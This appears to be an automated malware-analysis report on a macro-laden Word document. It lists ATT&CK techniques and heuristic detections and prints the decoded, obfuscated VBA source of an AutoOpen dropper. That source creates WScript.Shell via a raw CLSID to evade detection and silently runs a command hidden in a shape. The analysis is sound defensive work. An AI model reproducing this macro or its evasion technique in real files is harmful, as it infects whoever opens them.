Verdict: MALICIOUS
Risk Score: 252

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1218.005 System Binary Proxy Execution: Mshta
- T1566.001 Spearphishing Attachment
The sample contains VBA macros that run when the document is opened (AutoOpen). These macros use the dangerous COM object WScript.Shell to execute PowerShell commands. The script appears to be designed to download and execute a second-stage payload from a list of obfuscated URLs, indicating downloader or dropper functionality.
Heuristics (9)

- ClamAV: Doc.Malware.Powload-6779192-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Powload-6779192-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID [critical] OLE_VBA_GETOBJECT_CLSID_DANGEROUS: VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched line in script: End Select Set oZAdYfdi = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + VoIZdpM + afGinm + fvTTWdaK + YLAVBalq)) On Error Resume Next
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
  Matched line in script: End Select Set oZAdYfdi = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + VoIZdpM + afGinm + fvTTWdaK + YLAVBalq)) On Error Resume Next
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro
  Matched line in script: Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next
- Reference to PowerShell [high] SC_STR_POWERSHELL: Reference to PowerShell
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5293 bytes |

SHA-256: 78fc72d9d284507f066b0106f647b2820db8fae4401ff31e83a5943d77e5146a

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 110 of 178 identifiers look randomly generated (e.g. 'wIEaqKWmdfnQ') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "HXbEGlvJu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case qbkOiN
Case 68375030
wwhRw = CBool(AGjGHml)
NtfrmsrU = 84320892
hUGcX = CBool(tTwTqZi)
Case 182965248
CkdEoYC = CBool(JNqjqaS)
clXkd = Atn(XiIMnn)
qnLDUk = CBool(OPYli)
zOjsDtfJO = Atn(263063334 * CLng(73465813))
End Select
On Error Resume Next
Select Case czHQI
Case 166725721
hszikLlr = CBool(cmiUXjT)
vrXinBw = 117412365
QddWKO = CBool(kOaUXd)
Case 270118713
JjFAZpivd = CBool(VQBHuqC)
QvHNGS = Atn(UkIGwHR)
cYGww = CBool(iliAupzMc)
jSKNtn = Atn(315809158 * CLng(169611293))
End Select
On Error Resume Next
Select Case aZmLS
Case 23331969
fTpGzrZfT = CBool(pRbsQkpvp)
ADbqnv = 175747867
aZPhqao = CBool(LIpmOVs)
Case 253360620
DlIKow = CBool(disbrz)
CQAFuf = Atn(aBEmZ)
FCFfLock = CBool(SOmcw)
HiMlM = Atn(272740918 * CLng(257945701))
End Select
Set PwGFdk = Shapes("wIEaqKWmdfnQ")
On Error Resume Next
Select Case vWcwh
Case 169456876
KRNXC = CBool(rtlzEVA)
SlvwEsb = 262111437
uSYlXKPSi = CBool(WwIzT)
Case 136223296
wktYsNod = CBool(ljAdhZW)
SEdnUi = Atn(iZMifJl)
bPvquZC = CBool(jHvYi)
Bawaph = Atn(95267664 * CLng(282738003))
End Select
kaPfk = "" + AEYNli + XtSAK + QAtjZKnM + hFUENkO + PwGFdk.TextFrame.TextRange.Text + opOzvROz + WfjEZIcY + rkhvO
On Error Resume Next
Select Case ralwiamES
Case 103999769
zMWQcKPWV = CBool(QQwPGCkPB)
WZADPq = 274745432
JAXBwv = CBool(LtAjbDzp)
Case 327071244
KmicXCo = CBool(BbZMTA)
VENVWPRD = Atn(uIkjaLWk)
cFDGh = CBool(wikzTGzZ)
zGwmU = Atn(176728640 * CLng(74010118))
End Select
On Error Resume Next
Select Case vUhus
Case 88728886
CMHtkT = CBool(zOokq)
sYtcNKRjv = 39666124
dhjaZiQw = CBool(ioOtDnLI)
Case 309266648
fNjwQWa = CBool(jhwbG)
UQDnh = Atn(kXnCHDK)
YawIo = CBool(aZwkQEz)
jPrHiIZ = Atn(258625567 * CLng(233788732))
End Select
On Error Resume Next
Select Case JlYJsA
Case 31432039
vTPsG = CBool(HSJWNsY)
PrCjKvLsK = 230496179
XmiGSuE = CBool(XZYSsLFq)
Case 262037486
FBUuLWjHL = CBool(JpCJjQjkd)
qbIGAY = Atn(ZJUFFXwFh)
cbHaL = CBool(OciXPlcc)
NcFdsN = Atn(296920009 * CLng(261259652))
End Select
On Error Resume Next
Select Case LzmfZzT
Case 262855450
iaWcVXia = CBool(MFXDpPlL)
MEAfScl = 163112288
plmXoL = CBool(wwXfstHIV)
Case 23239767
EHHWuOaH = CBool(iDIuqwFt)
zoQLMrQO = Atn(iSzsJOph)
KSqXzh = CBool(Mvqcpwo)
SYOVsv = Atn(108606244 * CLng(43866728))
End Select
Set oZAdYfdi = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + VoIZdpM + afGinm + fvTTWdaK + YLAVBalq))
On Error Resume Next
Select Case krBTKrUF
Case 194695741
vNNfCYvb = CBool(EoVRW)
vFFmPrNi = 124189189
YIjjwKvr = CBool(LJshpzz)
Case 165465746
qwOaffOlO = CBool(Nqhiuw)
POrFuti = Atn(KiDXQmQSX)
WUzdBUKv = CBool(dfdazlL)
khkwDjiU = Atn(4037643 * CLng(78007216))
End Select
On Error Resume Next
Select Case WYwRaXkY
Case 25276366
wBFNjZAOX = CBool(AwOiTrjLs)
JILJUm = 18066899
okUvzQz = CBool(TFEcOwUIf)
Case 171130406
OwjoY = CBool(onppvtuW)
amiFzzk = Atn(YiHQAN)
DiucndEw = CBool(PIdHJXMJG)
VidaaMdiL = Atn(62051919 * CLng(114890501))
End Select
Const lGLXjE = 0
On Error Resume Next
Select Case wFctiSnY
Case 26204109
qNcMO = CBool(AVVIOYhbZ)
Iazth = 15729994
WECTE = CBool(NUubTT)
Case 119225001
KwqzQMG = CBool(YYAUaKM)
KXoJFIL = Atn(wDIoUzN)
HhziG = CBool(QpwwjiTkr)
HUQwf = Atn(59551597 * CLng(112995466))
End Select
oZAdYfdi.Run kaPfk, lGLXjE
On Error Resume Next
Select Case lLnAbE
Case 135102571
BXSMjJ = CBool(dHBbJirpA)
FPSRXr = 37736224
XDtuXsw = CBool(lXKfZN)
Case 63365356
bAYBrj = CBool(WmoWpBwif)
hJGwjj = Atn(fuwUi)
lrGDpWT = CBool(nrJXH)
VHMosiTs = Atn(28438263 * CLng(21514151))
End Select
On Error Resume Next
Select Case aACphzKYD
Case 1641119
AwlDuuPO = CBool(QoYSCNi)
XNjpNO = 40906173
ibvAFXpvI = CBool(murKY)
Case 78937904
Xalcj = CBool(TTzBqQzn)
fDPSTOWs = Atn(dJzakTMpX)
pnUXupbh = CBool(WziKQ)
PovGs = Atn(309619591 * CLng(9927627))
End Select
On Error Resume Next
Select Case QQbwObzrP
Case 65138532
jLIBIZDKM = CBool(lUzzTZqhq)
Bwthpckcj = 251331160
aVwrDajK = CBool(vctwfviw)
Case 311297369
HKZPq = CBool(SbMfoada)
LwwHQ = Atn(GXEwYDvCt)
mjfidAGIH = CBool(zXizUwSs)
zfqiCB = Atn(256402581 * CLng(138032789))
End Select
End Sub